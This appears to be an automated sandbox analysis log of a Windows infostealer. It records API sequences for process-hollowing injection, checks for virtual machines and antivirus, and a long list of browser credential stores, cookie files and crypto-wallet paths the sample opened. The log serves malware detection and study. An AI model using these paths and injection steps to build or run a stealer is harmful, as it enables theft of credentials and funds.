          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A81900_2_000A8190
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A10000_2_000A1000
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B60300_2_000B6030
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B3D100_2_000B3D10
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B89D00_2_000B89D0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000AFE200_2_000AFE20
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B82700_2_000B8270
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000ADEF00_2_000ADEF0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B57800_2_000B5780
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C6FF20_2_000C6FF2
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000A10002_2_000A1000
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000B60302_2_000B6030
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000AA0502_2_000AA050
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000A81902_2_000A8190
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000B89D02_2_000B89D0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000B82702_2_000B8270
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000B3D102_2_000B3D10
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000AFE202_2_000AFE20
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000ADEF02_2_000ADEF0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000B57802_2_000B5780
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000C6FF22_2_000C6FF2
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004390302_2_00439030
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040E0D82_2_0040E0D8
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043B8E02_2_0043B8E0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004098F02_2_004098F0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00440C802_2_00440C80
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00423D702_2_00423D70
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004195302_2_00419530
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004415802_2_00441580
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004089A02_2_004089A0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004287702_2_00428770
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040CF052_2_0040CF05
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004217902_2_00421790
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004068402_2_00406840
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043C0402_2_0043C040
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004208702_2_00420870
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00406CC02_2_00406CC0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004094D02_2_004094D0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043F8D02_2_0043F8D0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004324E02_2_004324E0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00405C902_2_00405C90
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00428CB02_2_00428CB0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040E9702_2_0040E970
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040AD002_2_0040AD00
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004341D02_2_004341D0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004035802_2_00403580
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004061A02_2_004061A0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004206502_2_00420650
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040B2102_2_0040B210
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004092102_2_00409210
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00427E202_2_00427E20
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00404AC02_2_00404AC0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00425E902_2_00425E90
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041FB602_2_0041FB60
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00440F602_2_00440F60
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041DB302_2_0041DB30
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004027D02_2_004027D0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004077D02_2_004077D0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00402B802_2_00402B80
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043C7802_2_0043C780
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004387B02_2_004387B0
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 000BA5E0 appears 66 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 000BD198 appears 36 times
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: .coS ZLIB complexity 1.000337184446254
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00439030 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00439030
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exe, 00000002.00000003.1772916719.00000000052D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeReversingLabs: Detection: 50%
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: file.exeStatic PE information: section name: .coS
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B9BE5 push ecx; ret 0_2_000B9BF8
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C7AAB8 push eax; iretd 2_3_02C7AAB9
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C5F487 push es; ret 2_3_02C5F4D6
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C5F487 push es; ret 2_3_02C5F4D6
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C5F2A7 push ecx; ret 2_3_02C5F2AE
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C5F2A7 push ecx; ret 2_3_02C5F2AE
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C5F6B5 push ebx; ret 2_3_02C5F6B6
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C5F6B5 push ebx; ret 2_3_02C5F6B6
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C0DECF push eax; retn 0002h2_3_02C0DED2
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C0DECF push eax; retn 0002h2_3_02C0DED2
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C0E72B pushfd ; ret 2_3_02C0E73E
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C0E72B pushfd ; ret 2_3_02C0E73E
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C5F487 push es; ret 2_3_02C5F4D6
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C5F487 push es; ret 2_3_02C5F4D6
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C5F2A7 push ecx; ret 2_3_02C5F2AE
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C5F2A7 push ecx; ret 2_3_02C5F2AE
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C5F6B5 push ebx; ret 2_3_02C5F6B6
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C5F6B5 push ebx; ret 2_3_02C5F6B6
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C0DECF push eax; retn 0002h2_3_02C0DED2
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C0DECF push eax; retn 0002h2_3_02C0DED2
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C0E72B pushfd ; ret 2_3_02C0E73E
          Source: C:\Users\user\Desktop\file.exeCode function: 2_3_02C0E72B pushfd ; ret 2_3_02C0E73E
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000B9BE5 push ecx; ret 2_2_000B9BF8
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00415057 push eax; iretd 2_2_00415058
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00418028 push esp; ret 2_2_0041802B
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041642B push esp; ret 2_2_00416438
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00418100 push esp; iretd 2_2_00418102
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041811F push esp; iretd 2_2_00418135
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004181DA push eax; iretd 2_2_004181DB
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00414BB8 push esp; iretd 2_2_00414BD4
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B9CC2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000B9CC2
          Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeAPI coverage: 8.1 %
          Source: C:\Users\user\Desktop\file.exe TID: 3740Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C17FB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_000C17FB
          Source: file.exe, file.exe, 00000002.00000003.1933544092.0000000002C07000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1933303365.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2026967826.0000000002C07000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2026882763.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1933303365.0000000002C07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043DF70 LdrInitializeThunk,2_2_0043DF70
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BA464 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000BA464
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D018D mov edi, dword ptr fs:[00000030h]0_2_000D018D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000ADD90 mov eax, dword ptr fs:[00000030h]0_2_000ADD90
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A9EF0 mov edi, dword ptr fs:[00000030h]0_2_000A9EF0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000ADD90 mov eax, dword ptr fs:[00000030h]2_2_000ADD90
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000A9EF0 mov edi, dword ptr fs:[00000030h]2_2_000A9EF0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BEFB0 GetProcessHeap,0_2_000BEFB0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BA458 SetUnhandledExceptionFilter,0_2_000BA458
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BA464 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000BA464
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BCDEA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000BCDEA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B9AF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000B9AF9
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000B9AF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000B9AF9
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000BA458 SetUnhandledExceptionFilter,2_2_000BA458
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000BA464 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000BA464
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_000BCDEA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000BCDEA

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_000D018D
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BA220 cpuid 0_2_000BA220
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BA8E5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_000BA8E5
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: file.exe, 00000002.00000003.1933584990.0000000002C64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1913239014.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1866028607.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2027036198.0000000002C64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
          Source: file.exe, 00000002.00000003.1933176350.00000000052CB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.2027381730.00000000052CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1913336239.00000000052CC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1866057194.00000000052C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1933691286.00000000052CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 4348, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: file.exe, 00000002.00000003.1933464874.0000000002C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: allets/Electrum"i
          Source: file.exeString found in binary or memory: Jaxx Liberty
          Source: file.exe, 00000002.00000003.1933464874.0000000002C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \\Exodus\\exodus
          Source: file.exe, 00000002.00000003.1824130914.0000000002C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
          Source: file.exe, 00000002.00000003.1845901808.0000000002C72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: file.exe, 00000002.00000003.1824130914.0000000002C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
